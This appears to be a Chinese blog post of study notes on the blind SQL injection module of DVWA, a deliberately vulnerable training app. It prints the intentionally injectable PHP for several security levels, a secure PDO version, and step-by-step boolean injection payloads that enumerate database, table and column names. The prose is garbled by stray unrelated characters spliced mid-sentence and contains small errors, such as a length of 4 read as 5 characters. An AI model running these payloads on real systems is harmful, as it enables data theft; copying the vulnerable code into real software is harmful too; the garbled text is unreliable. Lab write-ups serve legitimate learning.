DVWA筆記之SQL Injection(Blind)

SQL Injection(Blind)岩榆,即SQL盲注始锚,與一般注入的區(qū)別在于昼丑,一般的注入攻擊者可以直接從頁面上看到注入語句的執(zhí)行結果,而盲注時攻擊者通常是無法從顯示頁面上獲取執(zhí)行結果请唱,甚至連注入語句是否執(zhí)行都無從得知,因此盲注的難度要比一般注入高过蹂。目前網絡上現存的SQL注入漏洞大多是SQL盲注十绑。

手工思路

手工盲注的過程,就像你與一個機器人聊天酷勺,這個機器人知道的很多本橙,但只會回答“是”或者“不是”,因此你需要詢問它這樣的問題脆诉,例如“數據庫名字的第一個字母是不是a吧跬ぁ?”击胜,通過這種機械的詢問亏狰,最終獲得你想要的數據。

盲注分為基于布爾的盲注偶摔、基于時間的盲注以及基于報錯的盲注

步驟

1.判斷是否存在注入暇唾,注入是字符型還是數字型

2.猜解當前數據庫名

3.猜解數據庫中的表名

4.猜解表中的字段名

5.猜解數據

low服務器核心代碼

<?php 

if( isset( $_GET[ 'Submit' ] ) ) { 
    // Get input 
    $id = $_GET[ 'id' ]; 

    // Check database 
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; 
    $result = mysql_query( $getid ); // Removed 'or die' to suppress mysql errors 

    // Get results 
    $num = @mysql_numrows( $result ); // The '@' character suppresses errors 
    if( $num > 0 ) { 
        // Feedback for end user 
        echo '<pre>User ID exists in the database.</pre>'; 
    } 
    else { 
        // User wasn't found, so the page wasn't! 
        header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' ); 

        // Feedback for end user 
        echo '<pre>User ID is MISSING from the database.</pre>'; 
    } 

    mysql_close(); 
} 

?> 

可以看到,只返回兩種結果。即User ID exists in the database.和User ID is MISSING from the database.為盲注

1策州、判斷是否存在注入瘸味,是字符還是數字型

輸入1,顯示相應用戶存在
輸入1’ and 1=1 #抽活,顯示存在
輸入1’ and 1=2 #硫戈,顯示不存在
可判斷存在字符型注入。

2下硕、得到數據庫名

要得到數據庫名字丁逝,就要知道數據庫名長度并挨個猜測字符。
輸入1’ and length(database())=4 #梭姓,顯示存在霜幼,說明數據庫名字長度為5個字符。
猜測數據庫名的每個ascll字符誉尖。用二分法
1’ and ascii(substr(databse(),1,1))>97 #
后面接著猜測后面的幾位

3罪既、得到數據庫表名

首先得到數據庫表名數量:
1' and (select count(table_name) from information_schema.tables where table_schema=database())=2#
得到數據庫表數量為2個。

然后挨個猜測表名:
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>97 # 顯示存在
依次將表猜 出來為guestbook和users

4铡恕、得到字段名

得到字段數量
1’ and (select count(column_name) from information_schema.columns where table_name= ’users’)=8 # 顯示存在 即字段數量為8
挨個猜測字段名琢感,
得到長度:1’ and length(substr((select column_name from information_schema.columns where table_name= ’users’ limit 0,1),1))=7 # 顯示存在。探熔。驹针。。诀艰。

Medium服務器核心代碼

<?php 

if( isset( $_POST[ 'Submit' ]  ) ) { 
    // Get input 
    $id = $_POST[ 'id' ]; 
    $id = mysql_real_escape_string( $id ); 

    // Check database 
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = $id;"; 
    $result = mysql_query( $getid ); // Removed 'or die' to suppress mysql errors 

    // Get results 
    $num = @mysql_numrows( $result ); // The '@' character suppresses errors 
    if( $num > 0 ) { 
        // Feedback for end user 
        echo '<pre>User ID exists in the database.</pre>'; 
    } 
    else { 
        // Feedback for end user 
        echo '<pre>User ID is MISSING from the database.</pre>'; 
    } 

    //mysql_close(); 
} 

?> 

可以看到柬甥,Medium級別的代碼利用mysql_real_escape_string函數對特殊符號

\x00,\n,\r,,’,”,\x1a進行轉義,同時前端頁面設置了下拉選擇表單其垄,希望以此來控制用戶的輸入苛蒲。

通過抓包修改id參數,一樣可以實現注入绿满,可以利用布爾注入臂外,時間注入實現。

High服務器核心代碼

<?php 

if( isset( $_COOKIE[ 'id' ] ) ) { 
    // Get input 
    $id = $_COOKIE[ 'id' ]; 

    // Check database 
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;"; 
    $result = mysql_query( $getid ); // Removed 'or die' to suppress mysql errors 

    // Get results 
    $num = @mysql_numrows( $result ); // The '@' character suppresses errors 
    if( $num > 0 ) { 
        // Feedback for end user 
        echo '<pre>User ID exists in the database.</pre>'; 
    } 
    else { 
        // Might sleep a random amount 
        if( rand( 0, 5 ) == 3 ) { 
            sleep( rand( 2, 4 ) ); 
        } 

        // User wasn't found, so the page wasn't! 
        header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' ); 

        // Feedback for end user 
        echo '<pre>User ID is MISSING from the database.</pre>'; 
    } 

    mysql_close(); 
} 

?> 

High級別的代碼利用cookie傳遞參數id喇颁,當SQL查詢結果為空時寄月,會執(zhí)行函數sleep(seconds),目的是為了擾亂基于時間的盲注无牵。同時在 SQL查詢語句中添加了LIMIT 1漾肮,希望以此控制只輸出一個結果。

LIMIT 1我們可以通過#將其注釋掉茎毁。
抓包將cookie中參數id修改克懊。像users要改為(0×7573657273 為users的16進制)忱辅。

Impossible服務器代碼

<?php 

if( isset( $_GET[ 'Submit' ] ) ) { 
    // Check Anti-CSRF token 
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); 

    // Get input 
    $id = $_GET[ 'id' ]; 

    // Was a number entered? 
    if(is_numeric( $id )) { 
        // Check the database 
        $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' ); 
        $data->bindParam( ':id', $id, PDO::PARAM_INT ); 
        $data->execute(); 

        // Get results 
        if( $data->rowCount() == 1 ) { 
            // Feedback for end user 
            echo '<pre>User ID exists in the database.</pre>'; 
        } 
        else { 
            // User wasn't found, so the page wasn't! 
            header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' ); 

            // Feedback for end user 
            echo '<pre>User ID is MISSING from the database.</pre>'; 
        } 
    } 
} 

// Generate Anti-CSRF token 
generateSessionToken(); 

?> 

Impossible級別的代碼采用了PDO技術,劃清了代碼與數據的界限谭溉,有效防御SQL注入墙懂,Anti-CSRF token機制的加入了進一步提高了安全性。

最后編輯于
?著作權歸作者所有,轉載或內容合作請聯系作者
  • 序言:七十年代末扮念,一起剝皮案震驚了整個濱河市损搬,隨后出現的幾起案子,更是在濱河造成了極大的恐慌柜与,老刑警劉巖巧勤,帶你破解...
    沈念sama閱讀 217,907評論 6 506
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現場離奇詭異弄匕,居然都是意外死亡颅悉,警方通過查閱死者的電腦和手機,發(fā)現死者居然都...
    沈念sama閱讀 92,987評論 3 395
  • 文/潘曉璐 我一進店門迁匠,熙熙樓的掌柜王于貴愁眉苦臉地迎上來剩瓶,“玉大人,你說我怎么就攤上這事城丧⊙邮铮” “怎么了?”我有些...
    開封第一講書人閱讀 164,298評論 0 354
  • 文/不壞的土叔 我叫張陵亡哄,是天一觀的道長搂鲫。 經常有香客問我,道長磺平,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 58,586評論 1 293
  • 正文 為了忘掉前任拐辽,我火速辦了婚禮拣挪,結果婚禮上,老公的妹妹穿的比我還像新娘俱诸。我一直安慰自己菠劝,他們只是感情好,可當我...
    茶點故事閱讀 67,633評論 6 392
  • 文/花漫 我一把揭開白布睁搭。 她就那樣靜靜地躺著赶诊,像睡著了一般。 火紅的嫁衣襯著肌膚如雪园骆。 梳的紋絲不亂的頭發(fā)上舔痪,一...
    開封第一講書人閱讀 51,488評論 1 302
  • 那天,我揣著相機與錄音锌唾,去河邊找鬼锄码。 笑死夺英,一個胖子當著我的面吹牛,可吹牛的內容都是我干的滋捶。 我是一名探鬼主播痛悯,決...
    沈念sama閱讀 40,275評論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼重窟!你這毒婦竟也來了载萌?” 一聲冷哼從身側響起,我...
    開封第一講書人閱讀 39,176評論 0 276
  • 序言:老撾萬榮一對情侶失蹤巡扇,失蹤者是張志新(化名)和其女友劉穎扭仁,沒想到半個月后,有當地人在樹林里發(fā)現了一具尸體霎迫,經...
    沈念sama閱讀 45,619評論 1 314
  • 正文 獨居荒郊野嶺守林人離奇死亡斋枢,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內容為張勛視角 年9月15日...
    茶點故事閱讀 37,819評論 3 336
  • 正文 我和宋清朗相戀三年,在試婚紗的時候發(fā)現自己被綠了知给。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片瓤帚。...
    茶點故事閱讀 39,932評論 1 348
  • 序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖涩赢,靈堂內的尸體忽然破棺而出戈次,到底是詐尸還是另有隱情,我是刑警寧澤筒扒,帶...
    沈念sama閱讀 35,655評論 5 346
  • 正文 年R本政府宣布怯邪,位于F島的核電站,受9級特大地震影響花墩,放射性物質發(fā)生泄漏悬秉。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點故事閱讀 41,265評論 3 329
  • 文/蒙蒙 一冰蘑、第九天 我趴在偏房一處隱蔽的房頂上張望和泌。 院中可真熱鬧,春花似錦祠肥、人聲如沸武氓。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,871評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽县恕。三九已至,卻和暖如春剂桥,著一層夾襖步出監(jiān)牢的瞬間忠烛,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 32,994評論 1 269
  • 我被黑心中介騙來泰國打工权逗, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留况木,地道東北人垒拢。 一個月前我還...
    沈念sama閱讀 48,095評論 3 370
  • 正文 我出身青樓,卻偏偏與公主長得像火惊,于是被迫代替她去往敵國和親求类。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當晚...
    茶點故事閱讀 44,884評論 2 354

推薦閱讀更多精彩內容